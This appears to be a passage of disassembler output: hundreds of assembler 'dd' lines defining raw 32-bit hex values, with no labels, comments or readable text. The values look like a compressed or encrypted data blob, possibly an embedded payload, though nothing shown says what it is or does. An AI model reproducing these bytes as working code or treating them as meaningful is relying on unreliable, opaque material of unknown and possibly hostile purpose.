dd 0A1F342C8h, 3F4C29BBh, 57FE1403h, 0CD104156h, 0A348A0FDh
dd 0CD449AE4h, 7B0DE8E0h, 6A03FCC2h, 0BD117F4Eh, 48A1C451h
dd 5F5696AAh, 0A03D8B85h, 0BEDB9D88h, 0CBE0274Eh, 2D14755Dh
dd 5156D7FFh, 489D208Eh, 0EB161D46h, 2772AA22h, 8B92C078h
dd 18A350C5h, 420555EBh, 85B54B3Ah, 649AE35Ah, 6B3A49F3h
dd 21C99322h, 611E3966h, 31B6098h, 1812C561h, 748F975h
dd 9CDEC8F2h, 2B8E20A6h, 0F85EBEC6h, 1456508Dh, 34400C2Fh
dd 3B26E877h, 582670EBh, 6D037208h, 237F202Bh, 0DA553ACBh
dd 4DB4F7F6h, 0D5C9AE44h, 0E8101A82h, 0FBD2B086h, 8B145C66h
dd 11C1BE09h, 0C3137B98h, 81C358EBh, 75761904h, 9942480h
dd 1FAA8C14h, 7E9860A1h, 4075DE90h, 5FBFACAh, 0E6F2F61Bh
dd 59C09AD8h, 75C6EE03h, 9044870Ch, 59446AE9h, 0ACE88512h
dd 0CCB8DABh, 0C75F8B17h, 26B3489h, 0A0685409h, 8CCC0110h
dd 2B9C74A9h, 6AC7ADF6h, 5E202238h, 61B1097Fh, 1B6A5935h
dd 1586FC2Dh, 0A2F5A34Bh, 1C688343h, 2E888D0Dh, 29EB8A36h
dd 0BFBC2882h, 0E071463h, 78890A05h, 33241C88h, 0FDC2508h
dd 0D683E926h, 310D14F2h
dd 2BC18114h, 90D3EA54h, 0CE7D3237h, 771FD94h, 2855D014h
dd 380E0BF2h, 7C04588Dh, 0AA17CEBFh, 0F8103FE3h, 12844A7Ch
dd 905281C2h, 0A66CE885h, 0A8DB283h, 0B50C8D4Dh, 83016181h
dd 20834805h, 84908D29h, 0B9F52690h, 39803A52h, 8285D624h
dd 9BC28111h, 0D672B081h, 3D392846h, 0A67C163Ah, 0A4511EBh
dd 8533415Bh, 0FB6D7EFFh, 84EFA73h, 8456B3E4h, 38A5105h
dd 848401A8h, 0B3D11F8h, 0B57B16C8h, 3C4A5266h, 521F1F1h
dd 83AAC02Fh, 6B091FE6h, 0D40338F6h, 203968B0h, 62066192h
dd 2A044688h, 0FA4CCDF2h, 2DD8A85Fh, 8C6FEB71h, 3E2277E5h
dd 80465B7Ch, 8343E033h, 1EFE56D2h, 937C0901h, 0F38BA282h
dd 4B354285h, 13F50641h, 0EE0A6F30h, 44E8043h, 0C672EB98h
dd 0B8194CBh, 3EB7F0FBh, 0CBDC58F6h, 0F548C317h, 0F5C8016Eh
dd 31996F50h, 0B8860D31h, 8854374h, 9C573F29h, 3E893461h
dd 8C983F3Ch, 19847502h, 1609EB40h, 4AC4EF03h, 0DB719608h
dd 377430CAh, 0B64092ABh, 648C728h, 39B90EDh, 8C0F03FBh
dd 91157D67h, 0A4B0B2DDh, 1166A529h, 0D4B415F9h, 0CA7FC274h
dd 10E4A6D6h, 0B896D0B8h, 81435C49h, 4EBF5753h, 90BB5330h
dd 0F154E7D6h, 850D9D05h, 0F7A7C0EEh, 4461A3D0h, 5660EB47h
dd 580E8E3Fh, 0FD333923h, 0BC1CD9BDh, 46F1F0A7h, 0B04308A0h
dd 2171506Fh, 0F43F3DACh, 6A241AEDh, 0BE07F003h, 0EBB50B4Fh
dd 912A850Bh, 10E08F82h, 8588F049h, 0D6F70D7Ch, 0B1610410h
dd 830960DCh, 0BB64252Ah, 279A39E1h, 42D854F6h, 8B56A7E7h
dd 179829A8h, 539270Bh, 76E2224Ch, 0EC08C91Fh, 868DF185h
dd 99B89E8h, 554A6215h, 75643083h, 0C74AC974h, 0F6278CA3h
dd 0C15ACA74h, 0A37F23C3h, 850C20F4h, 0BC1F148h, 8C108565h
dd 46AAE6E8h, 0B8D8C28h, 1092392Dh, 0BE644B17h, 0A480FD35h
dd 0F2209FFBh, 27FC56A7h, 727E20DCh, 88E28774h, 95841894h
dd 808508Ch, 0C429CC98h, 7D8AE809h, 74D120C5h, 744717CAh
dd 4486F428h, 580F6B66h, 48504409h, 3848F48Bh, 28223091h
dd 5D20719Fh, 21A1749Ch, 98C19F5h, 29AC1298h, 582035F7h
dd 88859710h, 21D696C0h, 10889614h, 1966BF97h, 70450948h
dd 0A120E73Eh, 0A10E9710h, 0A41A9710h, 0A6C45C32h, 4409CC84h
dd 0E489DCD4h, 0F424EC12h, 0FB970744h, 58FD20CAh, 0DCC2024h
dd 89380928h, 8AFB144Ch, 0B63AE920h, 3F044B4Ah, 0D713CB50h
dd 17508E13h, 82A94589h, 1F40664h, 0AE850FF0h, 3CFD453Eh
dd 7412F4DAh, 167F5A8Ah, 5679840Fh, 8465BD7Ch, 3B31DA30h
dd 632C91C3h, 97E85009h, 4C73840h, 18202428h, 0B250A351h
dd 31822A3Ah, 8E540C0Ch, 58F56D45h, 458D1B86h, 0E2271CF4h
dd 6B747EAAh, 89238C6Eh, 0F47D04B5h, 3F81BB02h, 6756D9F0h
dd 6B386C4Eh, 0A33059DAh, 14747160h, 18D85668h, 2CC82022h
dd 5A1945Ch, 0EAD1C44Fh, 3979CD80h, 7128A90Dh, 72774091h
dd 610E3551h, 436AF56Eh, 0D840F345h, 565174CEh, 4952D1D0h
dd 7F19E9C0h, 6A518804h, 0E03121B8h, 3D50010Ch, 67412BCh
dd 257BCEFCh, 0AD2F3375h, 0C8A0790Ah, 0B4EA509Fh, 0AAF04C8Eh
dd 4D81090Bh, 2070D0F0h, 944EB2Ah, 523B0440h, 6676E5A1h
dd 7431C045h, 0B3C9FC29h, 0B526BBBDh, 3FA10ED0h, 53A11DE4h
dd 13201E58h, 0F84ADE47h, 42FC3695h, 50A6813Fh, 4CC6E811h
dd 94BD1018h, 5F218AF3h, 0CC75111Ah, 73D2975Ah, 53111BF3h
dd 0B540B1A6h, 6E3D210Ah, 38D00FD1h, 428FFE1Ah, 0CE5ED24Fh
dd 0E8AEE01h, 0B02F0A88h, 287CB7Fh, 0A60BE818h, 5EB4461Ch
dd 123E3989h, 5D2843E6h, 4C6E5714h, 57149A9Bh, 1F2F4FC2h
dd 2B20C32Dh, 0C7D5D05h, 0A5CC8731h, 0B4B9101Bh, 7944D5A3h
dd 0CAF21E84h, 84CA55FAh, 0D1920BD3h, 0FF37B0A8h, 8A0FC138h
dd 4008F80Ah, 1E894254h, 0AE19EB88h, 98FFED0Fh, 0CA4DFF05h
dd 243DEE70h, 0A41815C6h, 0D6348B28h, 3ECFC64h, 5C88506Ah
dd 0E958D806h, 0C2E09278h, 0A552E89Ah, 824FB99Ch, 7CA26EB8h
dd 29D40F5h, 0A0C607Eh, 0A1147503h, 2A24729Dh, 2907C35Eh
dd 40D0D89h, 0EBA51BE8h, 7240ADBh, 8009EBDFh, 0C0424B7Eh
dd 0C1BC22E6h, 66461875h, 95287A0Fh, 0EB25ADECh, 25077323h
dd 740E9ED9h, 71DEA0Ah, 731F6A2Fh, 0E4603251h, 0F7FB9655h
dd 85C1BEFCh, 53421819h, 690ED25h, 2F83DF4h, 0C88B589Ch
dd 3D436435h, 5A819D50h, 1F74D12Bh, 4014E351h, 2C1EA20Fh
dd 55090A5Dh, 840B5DECh, 27373FF1h, 25F869DCh, 6DF9F75Bh
dd 0E740401h, 0CC7B5EE8h, 0E3D2058Fh, 1A951C24h, 0A35CC8AEh
dd 64B3845Fh, 0B270EC4Fh, 0C8732904h, 260DD82Dh, 0CD93A02h
dd 26700A2Eh, 12CF61F0h, 89E42925h, 58667295h, 19326C41h
dd 290A112Bh, 0E5BC4A3Fh, 36B4864Bh, 80B8D2F4h, 1B9095C7h
dd 0DFE0D142h, 88CEBBE3h, 82EB14E9h, 0C740293h, 77E77CB3h
dd 0DC6BCC52h, 1B840230h, 338B66A4h, 2DCE4CDCh, 0C560A1C6h
dd 4C09BD13h, 0CE88EB02h, 904A92E0h, 0B180EC0h, 969575C0h
dd 10191432h, 0F1EB8755h, 6115D8C6h, 0EBD3110Ch, 0FF837F41h
dd 0D8345F5Ch, 0D1390CCDh, 3BDB3AE9h, 0BD800EAh, 0F7F475C9h
dd 0E8C3B0F3h, 457CD964h, 0E6E00744h, 3172D103h, 77513B0Eh
dd 0E307E108h, 176590Dh, 0A53F9A4Eh, 5BA16B18h, 2FBFA32Eh
dd 0AB854445h, 10141E38h, 8977E457h, 0A922DAE8h, 8157CF83h
dd 1175596Bh, 0B7A31EF4h, 8B778FCEh, 0EB25D7E4h, 9D01F04Ah
dd 3D0E5E2Dh, 0DBB422CCh, 13F2794Eh, 0F76B5354h, 8610AC99h
dd 0CFEB5969h, 6B26B6CEh, 4DA2F63h, 8D0729F1h, 79F3044h
dd 0DBEDFD20h, 19C5AB44h, 0E0883BB8h, 25BF7D42h, 6808AFCEh
dd 0E4E012DCh, 0FE7BF861h, 0B5E81C0Ch, 0CF202DA2h, 84149A3Ch
dd 0D691C6B3h, 8B522EE9h, 7C1D0ABDh, 4902F08h, 0E8342172h
dd 6DF8458Bh, 0A529712Bh, 5D88D779h, 87EB64B1h, 0F9C1200Dh
dd 1C728D05h, 0F0456DBCh, 0F0899767h, 314C2400h, 2E112C7h
dd 4AE82684h, 1F304191h, 0A6391C23h, 0C205A2CAh, 0DA095BEBh
dd 591B2530h, 34545EAh, 1CB42F6h, 0F4A1C74h, 0E88584C5h
dd 2E1FFEABh, 1FBFAA7h, 1AEBE055h, 59A1E2E8h, 0EEEAED4Eh
dd 4D836081h, 22247ADCh, 0CC88EF9h, 0DC73EEA0h, 0C0D75CDEh
dd 0A1C3CFE0h, 63456D45h, 0D09ED5FCh, 0D19488FAh, 8B1B9D14h
dd 680D249Ah, 6CB539BBh, 9CDC1328h, 0A0643490h, 0A9AC9806h
dd 3F25748Dh, 28270AB0h, 777179E8h, 0B35F7730h, 0B04BC2BCh
dd 49E92814h, 20B5224Ch, 0DE125377h, 1308E383h, 0DB212FDBh
dd 7C3C8D57h, 307C0D6h, 7488AC3h, 0D0C90224h, 0A85DFEF9h
dd 88900DF5h, 0AEBEAB4Dh, 8B0AF516h, 0F7097A8Dh, 0A1ED7AD1h
dd 0C9A00E3Ch, 0F2DBC48Eh, 43DE78A0h, 0D5E90EAFh, 0E6FC1604h
dd 0F42D0FC8h, 81E84120h, 662A23FDh, 9491FA12h, 840F053Ah
dd 7C25ABF6h, 8C035609h, 88E91A21h, 0C54EFDE8h, 9D6C9FE4h
dd 484F64F0h, 7C84C9C2h, 42501837h, 35C34FFh, 2F6C48BDh
dd 0E7C6CCBCh, 7FCA815h, 0AB7D800Ah, 8BB21C0Ch, 0B0B83822h
dd 8B0655Bh, 0AAA526BDh, 6B207548h, 3305E7Ch, 3FF860Fh
dd 0A45C3586h, 1E886C9Ah, 0AB45308Ah, 6850F7Eh, 0E3FA69DEh
dd 4B0A3CCAh, 8067D5C3h, 56E8884Fh, 6960953h, 16A1A75h
dd 81AC5FF4h, 8B1DCFD8h, 0C30CC475h, 0AFCC3190h, 2030EB8Dh
dd 2B3D9CB7h, 638528C6h
dd 86352397h, 0DE2D4199h, 87A12E08h, 463C8191h, 0A9A44513h
dd 836A26F5h, 630CB338h, 4DAF1751h, 2805BAACh, 1B118475h
dd 9CB6409Ch, 0C889ECBFh, 6A934F64h, 50B0F880h, 0A285EA56h
dd 55F7322Fh, 0F53900E2h, 0FE43B125h, 0A0CD01B0h, 8CF8EA21h
dd 2AD5A420h, 70FF887Dh, 0D139AC9Fh, 0C6CA3AC0h, 410D9409h
dd 4602E4F1h, 7ACD8233h, 820315E3h, 0A0060298h, 13C64EBh
dd 0E42CF576h, 0B70F1B02h, 6623E00Eh, 11F94983h, 7C46C21Ch
dd 0FC44A051h, 48A4AD11h, 238829D4h, 0AEFD3993h, 761AE718h
dd 0F0A23B66h, 9485BC82h, 21A046A5h, 6B1D7486h, 44462DA1h
dd 0C7E8292Eh, 66744420h, 318B48D3h, 0FA839CCh, 279822Ch
dd 263E984h, 85682412h, 25F7221Eh, 24580E8Ah, 33CF294Ch
dd 745FACE4h, 0E78AF0D4h, 1465B024h, 4D3C2165h, 2B8EC4C8h
dd 9EA9CEAh, 89983BB4h, 42B02773h, 60BCB06Eh, 8041128Ah
dd 750A39FAh, 9C6D365h, 5B2240F3h, 6831088h, 60497D81h
dd 0D1721283h, 2B696119h, 492544D6h, 186A5E94h, 0CA21545Bh
dd 0CA941101h, 0B08A0EC5h, 533F932Bh, 837209B8h, 2B6392E9h
dd 5753F09Eh, 0CA849B9Dh, 0BC113401h, 2431B299h, 0B75E1983h
dd 8199B47h, 0D9F9D54h, 0C3EAFFE0h, 4007C721h, 8B5E0519h
dd 89C25687h, 810A8210h, 299E64FEh, 56A3C772h, 22C82746h
dd 775882FAh, 10B22FFh, 0A4409D9Ch, 62F3862Dh, 249F4516h
dd 0B86585A7h, 0A5725EDBh, 53A4052Ch, 8ACB1DA1h, 6EA4CE03h
dd 59DFA054h, 0A2B024C6h, 16D4A107h, 527F7B43h, 0F42BCC89h
dd 0AB5B681Eh, 8C542E5h, 0E51239Ah, 0C12B4B02h, 0FFB92DDh
dd 3CF41CACh, 758652ABh, 3005AAD1h, 0CC677974h, 3087C7C5h
dd 3584255Fh, 451A3618h, 9EC2E790h, 9743DD7h, 58947598h
dd 0EB79D47Fh, 2C694996h, 0CA471F42h, 5BDBA450h, 0DEA02628h
dd 7D313645h, 944DA587h, 69E1BA51h, 959C8C07h, 0C487230h
dd 88D51B4Ah, 4B212D44h, 12FB2A6Dh, 57567538h, 3F361E6Eh
dd 0D207496h, 40115E8Ah, 9C3FE88Dh, 0EBE2A394h, 67D6642Bh
dd 0B5592155h, 408AD827h, 809C4FA0h, 561A3827h, 0E8C54E6Ah
dd 1C2D4812h, 17D6FDBDh, 0CEA4F216h, 98A1A003h, 4F50BF5Fh
dd 2051421h, 9BA3E85Eh, 1811A75Dh, 847F6BE8h, 0DFB0E73Ah
dd 3489BF9Eh, 1B7DD64Ch, 1E9BDF23h, 7F4921C4h, 0D553ECBAh
dd 199BB6C2h, 233CDE9Ch, 0C911AA88h, 0BF4A74F8h, 961655B0h
dd 0B2FCDBAFh, 0F99BC4ACh, 0E407B827h, 39D516EBh, 41B56377h
dd 4D837543h, 7CAEBDE4h, 0B84B1E05h, 16CBA261h, 6405F409h
dd 74411D2Fh, 8DE8612Ah, 96007CEEh, 84EA5394h, 1381AA52h
dd 0C7D90C49h, 1C4118E5h, 1B8F11EBh, 14AD8D04h, 2130232h
dd 83144D8Ch, 0C2046127h, 29A8D9C3h, 0E80E0215h, 82949AB7h
dd 5758ABB7h, 5809CEAAh, 9A71E81Ch, 18525896h, 91A986A4h
dd 0FD5EAD02h, 35FAC845h, 0D00A5E28h, 1000D40Ch, 0E0190144h
dd 0D6B83840h, 1A3B01FEh, 2B60A1h, 146A569Dh, 7752D5Eh
dd 0EB0C25F1h, 9D7DBC06h, 4A34585h, 82046A1Ah, 0BFB30E27h
dd 2A58A388h, 0A06CB97h, 35895626h, 0F5E8051Ch, 51938EDh
dd 611A6A3Ch, 0B9D233ACh, 31A85845h, 27891540h, 20FE020Ch
dd 0F9BF482Fh, 1E116060h, 0FE6AEA7Ch, 0F0455E64h, 0AA8B5744h
dd 9C096284h, 0C29405FFh, 0ED902A2h, 0EB503E07h, 5CC625DCh
dd 89024130h, 427F9831h, 880F507Ah, 0D3A45FCEh, 1996E817h
dd 83D6442h, 0E644DD14h, 17406BFCh, 6C3551FFh, 8255DEDh
dd 0D0FFAC2Bh, 0F03BC1DCh, 38702272h, 77F1C040h, 2BCE8B1Ah
dd 9C300F99h, 4DE85110h, 810B22FCh, 7BDE0C4Eh, 83A05998h
dd 562027C6h, 71CAEA7Eh, 167D14E1h, 358A13Bh, 5161D4F8h
dd 48810C25h, 1F032C49h, 20341408h, 2E912F50h, 0C14FED43h
dd 503D1EB8h, 60811768h, 0B8F50C5Eh, 0D414F131h, 0A9B74545h
dd 36229524h, 8A4C192Ch, 4C14F9C9h, 2F127D0Ah, 8D659768h
dd 0B36B2A7Dh, 98B684BAh, 0A75FA278h, 0A13B652Dh, 0C60AA7B3h
dd 9E01FE69h, 10182410h, 53B34F1Dh, 4ECFE64Bh, 0F0F00FD5h
dd 78C3B5F3h, 8111A7EFh, 6E0D76FBh, 605146A3h, 0EB144C78h
dd 38B0D7Fh, 81722058h, 767F03C5h, 5F468683h, 53860AE1h
dd 0BB022701h, 8654A733h, 0D4BA52E5h, 1B04BF0Dh, 0FF13A15Eh
dd 0E1A17134h, 1A6606C2h, 0FF3DD0F5h, 366376E0h, 180F74CEh
dd 0EE570BC7h, 985850E8h, 0F709DE47h, 0EF955497h, 2F17EC6Dh
dd 858BFD83h, 4A638BAAh, 406D9496h, 2818772Eh, 6A41CCE8h
dd 217AAE22h, 65B1A6B9h, 983A8174h, 0E8BFE92Fh, 0AC068836h
dd 0B7C7EEB6h, 4117B593h, 0E81A840Fh, 24243102h, 0CA80014h
dd 56575351h, 14984F9Eh, 9F5D8912h, 28042C41h, 1473D97Ah
dd 0BB81102Bh, 61336228h, 74CB924Dh, 0EB7160BDh, 0FADCB95Bh
dd 4834C87Ah, 6B53C9ADh, 1AB9B814h, 10116386h, 86977DD3h
dd 21D6E97Bh, 0CE6DEAh, 0FE8AE804h, 0CBD259B7h, 2D904E12h
dd 6282A031h, 55CB5D79h, 0AE8934E7h, 41B71122h, 553225AEh
dd 0A77EB873h, 8A062809h, 0BF43C151h, 0EA59B992h, 0EF791799h
dd 28441422h, 0B0C8910h, 0A2CF0822h, 3164CCC3h, 809C90C8h
dd 2FD10308h, 0FF9347EBh, 900C48D4h, 8614BC08h, 0CC81042h
dd 0C760F91h, 2B4E0976h, 26D61B33h, 15DB3E0Ch, 0F70C8808h
dd 6BE1DA5Eh, 0CA9BC1D2h, 0D9D1D3C9h, 545E6842h, 10BB2E1Dh
dd 0B2E38520h, 5D4A21BBh, 0F9D2808h, 5D950FDFh, 0AD44C753h
dd 75BE9609h, 0F593CC71h, 0A1ADA44Ch, 0A76F53EBh, 4D382231h
dd 805D5673h, 0E22A533Dh, 0E045300Ah, 8B0B747Eh, 83FC7304h
dd 56EB09EEh, 0AE888415h, 8A259A28h, 75131ADCh, 28BECD13h
dd 0A18AF480h, 0A3E8C600h, 79878555h, 63B6864Ah, 0A64322B1h
dd 29DF0FBDh, 337FAF20h, 17826FFFh, 972105F6h, 836B5601h
dd 0C6370A7Eh, 0EE625DB3h, 4C155CCEh, 0F0F61622h, 232214F7h
dd 57096202h, 3DFF9B29h, 538952B1h, 51B112FFh, 12D0188Bh
dd 63DF6AD8h, 403E1599h, 4FB3F73Fh, 0AEB5A9F9h, 99CDE704h
dd 9A5DCC0Bh, 6D48553Ch, 38388108h, 0D12EC1DDh, 3B953DA8h
dd 182DE2CAh, 0E867A074h, 0A9D9712h, 4393BD38h, 8997A801h
dd 7317D077h, 0A3804DE8h, 75EB58C2h, 12801D5Dh, 0BD4D5220h
dd 4F8A280h, 92FA08F9h, 7F75E90Ah, 142CFC83h, 84784A97h
dd 89AF50C5h, 148CE6EEh, 75F4182h, 8820024Dh, 45388500h
dd 6597F4h, 149B8C2Ch, 23583FEEh, 71D30CA5h, 0DA705E49h
dd 4CE2117Fh, 85C80B01h, 9750C0Dh, 0E1F7EC21h, 0D3539434h
dd 9217740Ch, 0A9103E3h, 2ED3E1E1h, 0ACF8CC64h, 0BBE49F76h
dd 96AC2C20h, 199288A8h, 2BA95D17h, 0F26CFDD3h, 8142432h
dd 92F188FCh, 50518169h, 89D5228h, 14E80D24h, 8BE0243h
dd 366B15D5h, 55FE27C5h, 0FFA0505Eh, 0B7AC5A34h, 44FCD038h
dd 0A35A64A8h, 282138B6h, 9832522Dh, 7F3A75F0h, 0E2C637Ch
dd 5D43B06h, 1AB2D76h, 0B30C8B32h, 0AADA5589h, 567C334Fh
dd 172334ACh, 0B428441Fh, 9A64970h, 52EB5F44h, 0F15BB7B7h
dd 358E6AC3h, 54644350h, 2981108Bh, 28840479h, 0B851FE61h
dd 76527307h, 53087B39h, 0A741DB05h, 9A70BBECh, 0BEB29D2h
dd 6C8B9409h, 2045F84Eh, 36B7943h, 58505155h, 86945D59h
dd 0FF27F034h, 0E9DD7CD0h, 565994F4h, 6CEA486Ah, 0F158EAA0h
dd 2BE37FC3h, 5A6879E4h
dd 599B87A4h, 0E2FF3E93h, 0E65E9815h, 0A03D9C6Ch, 9515EB26h
dd 0A854B65h, 131305C7h, 8CECE294h, 1D227E12h, 534067DCh
dd 18603849h, 0CB3B405Ah, 83F61275h, 14BC80C9h, 487DC12Bh
dd 17D0CC4h, 510CE0C6h, 76A630A1h, 0BBAB9A7Bh, 0A39627D4h
dd 858439E9h, 208C59CBh, 40F69E31h, 0B5068BC9h, 457DB4FAh
dd 0F06A35F0h, 303101D7h, 0DF345324h, 918EBA14h, 0C5040BE5h
dd 0DB929BDFh, 0D6D6F220h, 408E6483h, 0E06A437Eh, 58D21C33h
dd 72C171F7h, 3F9B2037h, 483D0825h, 12137704h, 4C114DE8h
dd 74DCC463h, 48C31C5Ch, 0A2524F6Dh, 8CC0B005h, 9CD51A8h
dd 4F4D3226h, 0E065A2B8h, 0FE9FC6F4h, 64DABCEBh, 574D3DA2h
dd 0EE5EF6C2h, 6CEA6A67h, 0E28D27AFh, 24359208h, 21921014h
dd 0C506EC96h, 0F217C88Bh, 4264A6A8h, 0F76644C1h, 32F8EFC6h
dd 1C962974h, 3123B006h, 8F124D3Bh, 0F35816A7h, 39180694h
dd 4090E9E1h, 457ECB20h, 0F142BEACh, 9473920h, 8F19B358h
dd 38F4E510h, 0C76A0A4Dh, 0F649BE06h, 1AEB0A22h, 855B28C1h
dd 0F08B42C1h, 31BAEB75h, 0F8B24153h, 52644B56h, 90228AC3h
dd 7531B6A0h, 6EB0804h, 29058959h, 0C6205949h, 0D70F9D43h
dd 1423EFD7h, 34795859h, 0A4D4136Bh, 9AA4E99Fh, 4BC0865h
dd 14889DD5h, 53AD493Ch, 0E8CF98AAh, 0F8104A12h, 0EC1ED9F2h
dd 219A213Ah, 95361601h, 0E84DA676h, 4C55B22Dh, 77E8B748h
dd 0ADDF992Eh, 2CC1016Ah, 9C5020D4h, 506DA986h, 1B901722h
dd 0F68FF830h, 7DC6B7E9h, 14B23D7Eh, 0E53877E0h, 79C41652h
dd 58FC4B0Fh, 0C7DD12B1h, 78163707h, 158AE962h, 0FF32F891h
dd 0EDAAB453h, 90E804B3h, 3499AA8Fh, 0A5224AF6h, 7268F4DDh
dd 25EB8004h, 0DBB21D92h, 0A25020A9h, 0EC14DC49h, 5B6F7DE8h
dd 0A87357F8h, 18DEF7B6h, 7F23F61Bh, 0FA4A69E8h, 451A3B92h
dd 1865274Bh, 0C9944FAAh, 8A4B2849h, 95E8C731h, 8459EB92h
dd 0C7849413h, 0FB1874B8h, 1382FF4Ah, 658DC682h, 5CB1E4E0h
dd 0CD04974Dh, 98E5AE8h, 1067E5C9h, 97CA8408h, 16281619h
dd 8C24550Ch, 0E80A6C1Bh, 44CEFC2Dh, 9374F720h, 0E44CE8E2h
dd 0BB70A4E7h, 7A562B4Bh, 12E5981Fh, 943A75F9h, 46E705B7h
dd 2BE78D56h, 0E2CA25D4h, 88703510h, 26A7834h, 15A3582Ah
dd 948A0569h, 8CCF70BBh, 708EC770h, 184684E8h, 0C3BE0721h
dd 10442088h, 421C0C32h, 11AB8E18h, 0D6813C1Fh, 77A6C1F0h
dd 84B76634h, 102E0D96h, 7FA98909h, 0C26945F4h, 6A503FB2h
dd 0B2E8E483h, 57DE8CCCh, 4C2026F5h, 126A45B9h, 5D6411DDh
dd 0EF082DCAh, 3A675ACBh, 0E24DA9E8h, 0B875EB84h, 461B4C25h
dd 0F51420BDh, 0CA39CD54h, 37E87350h, 25DB9B0Dh, 47241764h
dd 1E93C23Bh, 2410D122h, 0E8CA5F0Ch, 1249AC5Dh, 7E7F6A1Dh
dd 6D0C13D2h, 15B4510Eh, 0F4EBAD94h, 3F44924h, 6A8D8708h
dd 0B7EC10FBh, 102B8C94h, 248895CFh, 2156F86Ah, 1C11FE1Ah
dd 1A64FBF4h, 12084ECh, 0E86740B7h, 10D5DA1Dh, 56159B61h
dd 0D546E08h, 5F01008h, 21147886h, 0BF208CFDh, 3608F550h
dd 0FAAEEFEh, 53E69F61h, 0DEC22408h, 0D6E12819h, 0CEF02C0Ch
dd 43307886h, 21343CC6h, 541FA8BEh, 0F03808B6h, 3C7886AEh
dd 9E03A645h, 0F6167340h, 4413A99Bh, 85293E1h, 2756E248h
dd 83844C08h, 7BD10A35h, 10549E08h, 858CF73h, 845C676Bh
dd 0C2603363h, 0E164195Bh, 0F0680C53h, 6C78864Bh, 703C4343h
dd 749E3B21h, 78CF3310h, 7C672B08h, 83742385h, 446589EFh
dd 0D4161E00h, 0A210B84h, 509E8890h, 448C888Bh, 119032F4h
dd 84940CE9h, 9821DE43h, 9CC8D310h, 0A032C844h, 0A40CBD11h
dd 21B24384h, 64A711A8h, 0E7BE2CF8h, 357875B8h, 53B0605h
dd 33AB1248h, 56EC89F8h, 4CCC22FBh, 0D771299h, 35CF832Bh
dd 0A1252E5h, 21126522h, 5E7E4640h, 8E540C40h, 46194843h
dd 1C582410h, 14408C36h, 24468E5Ch, 60471820h, 1C408C77h
dd 18E18E64h, 1C688120h, 518A42EEh, 6C8902F9h, 868ADC38h
dd 10B8CC4Ah, 0C04E60A9h, 4F015053h, 0A04A86FDh, 0A5B026Ch
dd 0C22E78A9h, 4AB0110h, 7AF1EB24h, 0FFC66212h, 0F02BD31h
dd 1BA4068Ah, 2A308C6h, 0C18BEE73h, 0BDEB2EAh, 82FC5021h
dd 0C4924AFh, 8D14F128h, 934AFF46h, 4A97386Ch, 0C9A8892h
dd 8AF480h, 54841455h, 1E751D01h, 4AE1E4BDh, 9AC9A12h
dd 55104523h, 92038CB1h, 0B5A7400Ch, 1BDD04CBh, 0E80C1E26h
dd 0B9C42DA0h, 45EBC4B7h, 2BA5EDE7h, 53A05F24h, 2E7604CFh
dd 0A958E06Ah, 0DCCD7BBBh, 0E06F881Bh, 885BE243h, 0CCD7C0A9h
dd 9743CE27h, 0D5E9C262h, 4DAF7782h, 0C5F19685h, 0F7E90E1Eh
dd 46F6EA98h, 40C27E97h, 6977E0FEh, 4B433995h, 12BADC44h
dd 506886B7h, 50B8395h, 772B1794h, 1CFFC137h, 57342A9Ah
dd 4A5D67B4h, 0B2B3E9A2h, 9017135Fh, 0E425DF3Bh, 0C27784BFh
dd 4518886h, 61E22237h, 0C6DD756h, 2BD88B8Ch, 3D392F4Ch
dd 7489B7FCh, 0E9DE0233h, 65742BA7h, 67E27292h, 0C72F5248h
dd 0C368A15Ch, 5F45E9C3h, 10841717h, 0C2118247h, 7FC33298h
dd 7428A20Dh, 0DF249206h, 0A4F8BA02h, 42F8DA09h, 0C4A63E60h
dd 17B4985Dh, 210E75DBh, 8B835AA7h, 6ACCE96Dh, 6FE4DDECh
dd 8A9E42E9h, 8AB7262Ch, 0FC35F53Bh, 25FE1B93h, 8D0C5FBBh
dd 891D8A87h, 5B9929E3h, 0A1989E4Ah, 9E1A9E48h, 33E6FFE9h
dd 0DEB9494Fh, 0F99E7113h, 2205C9B5h, 8235EB4Ch, 4CA13ED4h
dd 27A4881Fh, 0FC43128Bh, 230FAE48h, 21251D02h, 94E8E4FBh
dd 45A08F56h, 7D9FB348h, 1821D469h, 75F49A39h, 6948450h
dd 84527B55h, 9A5756C4h, 2154423Dh, 9405120h, 11E01292h
dd 14244DA4h, 152E5197h, 3173C8BEh, 4601F8A8h, 7C2D55A5h
dd 0D6762D6Ch, 4BA0707Ah, 44DBF512h, 5CF54435h, 0F4C34F97h
dd 35F14F90h, 85ABBFCDh, 792C90ACh, 0D237A647h, 8679E3BFh
dd 3CD20A4Ah, 4AE5FD6Ch, 1272B9Ah, 5FEB06F9h, 22833C42h
dd 259054E8h, 0AC936874h, 8A71EB0Ah, 0C15C8168h, 39567562h
dd 34695205h, 1BA5D402h, 8E481FDAh, 564CCD76h, 0C559CEF1h
dd 0CBBB8608h, 5247DD0h, 37BBF3A3h, 0E97270F5h, 0E4D15D7Ch
dd 0E79F161Fh, 79D7DEAFh, 0DD1AFA9Eh, 6FD219E1h, 7C870EE3h
dd 0FD0D645Bh, 537316E2h, 0BEF60713h, 0EC56D54Eh, 0F4C6B27Fh
dd 74010517h, 9E92AB35h, 0DA6E7F30h, 0CB2B1D1Fh, 6E49104Eh
dd 13947E08h, 0EBF41EBAh, 0AAF50A33h, 0D6F60603h, 6A848C45h
dd 0BC060C83h, 27E05AB0h, 8A855A65h, 7F6D28D4h, 2DE3184Fh
dd 574CA4Fh, 8556E817h, 3BCF89ACh, 7DFDF410h, 73C22288h
dd 5661D41Ah, 97A4037Bh, 0E824750Ah, 301D5716h, 5384FCCBh
dd 93296E9Eh, 12CEBAF1h, 808423BCh, 0A19944E7h, 2DB0A913h
dd 0F70E49C7h, 4A419A3Eh, 15F32E6h, 75085E7Ch, 0AA042F36h
dd 0EC52963Ah, 1A10406Ah, 88BDE59Dh, 9CBC01Eh, 0DCDF2930h
dd 515E24C0h, 15391330h, 5D1D7424h, 2A76D94Fh, 0CE9739Dh
dd 0A9D0653Fh, 0A15911C5h, 0B188D068h, 3394FCCDh, 0B115560h
dd 17099E6h, 778A2C08h, 42B4EA1Eh, 2C91D74Bh, 24142D90h
dd 5408974Eh, 124E2813h, 0E01BE805h, 0DA2A15Ch, 86A3AFDFh
dd 12B60D66h, 855670EBh, 88EDEC82h, 80158B08h, 67BB1955h
dd 793C68A0h, 2DDB5B02h, 5589DD5Ah, 0E1441750h, 0F1C62E23h
dd 0FD2BED67h, 0FD84226Ah
